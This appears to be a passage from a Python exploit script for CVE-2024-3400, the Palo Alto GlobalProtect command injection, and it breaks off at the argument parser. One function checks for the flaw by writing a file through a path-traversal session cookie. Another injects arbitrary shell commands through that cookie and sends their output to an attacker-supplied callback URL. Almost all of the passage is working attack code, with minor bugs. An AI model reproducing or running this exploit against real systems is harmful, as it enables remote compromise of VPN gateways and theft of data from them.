def check_vuln(target: str, file: str) -> bool:
ret = False
uri = "/ssl-vpn/hipreport.esp"
s = requests.Session()
r = ""
headers = {
"User-Agent" : \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": \
f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
}
headers_noCookie = {
"User-Agent" : \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
}
if not "http://" or not "https://" in target:
target = "http://" + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f"Request timed out for \"HTTP\" !{e}")
print("Trying with \"HTTPS\"...")
target = "https://" + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f"Request timed out for \"HTTPS\"")
sys.exit(1)
else:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
if r.status_code == 200:
r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )
if r.status_code == 403:
print("Target vulnerable to CVE-2024-3400")
ret = True
else:
return ret
return ret
def cmdexec(target: str, callback_url: str, payload: str) -> bool:
ret = False
p = ""
if " " in payload:
p = payload.replace(" ", "${IFS)")
uri = "/ssl-vpn/hipreport.esp"
headers = {
"User-Agent" : \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": \
f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"
}
s = requests.Session()
r = ""
if not "http://" or not "https://" in target:
target = "http://" + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f"Request timed out for \"HTTP\" !{e}")
print("Trying with \"HTTPS\"...")
target = "https://" + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests.ConnectionError as e:
print(f"Request timed out for \"HTTPS\"")
sys.exit(1)
else:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
if not "Success" in r.text:
return ret
else:
ret = True
return ret
#Initilize parser for arguments
def argparser(selection=None):
parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )